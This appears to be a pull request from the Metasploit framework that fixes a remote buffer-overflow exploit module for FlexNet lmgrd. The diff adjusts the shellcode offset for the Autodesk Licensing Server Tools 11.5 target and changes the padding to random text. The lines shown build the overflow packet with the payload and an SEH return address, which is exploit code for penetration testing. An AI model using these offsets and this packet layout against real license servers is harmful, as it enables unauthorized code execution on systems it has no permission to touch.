### PR TITLE
flexnet_lmgrd_bof rand_text fix

### DIFF
--- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
+++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
 						{
 							'Offset' => 10476,
-							'ShellcodeOffset' => 5504,
+							'ShellcodeOffset' => 5484,
 							'Ret' => 0x0047d01f # ppr from lmgrd.exe
 						}
 					],
@@ -186,7 +186,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		if target.name =~ /Debug/
 			pkt_data << "a" * (65535 - header_length)
 		else
-			pkt_data << "a" * target['ShellcodeOffset']
+
+			pkt_data << rand_text(target['ShellcodeOffset'])
 			pkt_data << my_payload
 			pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
 			pkt_data << generate_seh_record(target.ret)


### PR DESCRIPTION
ShellcodeOffset was incorrect for "Autodesk Licensing Server Tools 11.5" which made the use of rand_text() to fail before the payload.

Other versions of lmgrd have been retested successfully. 
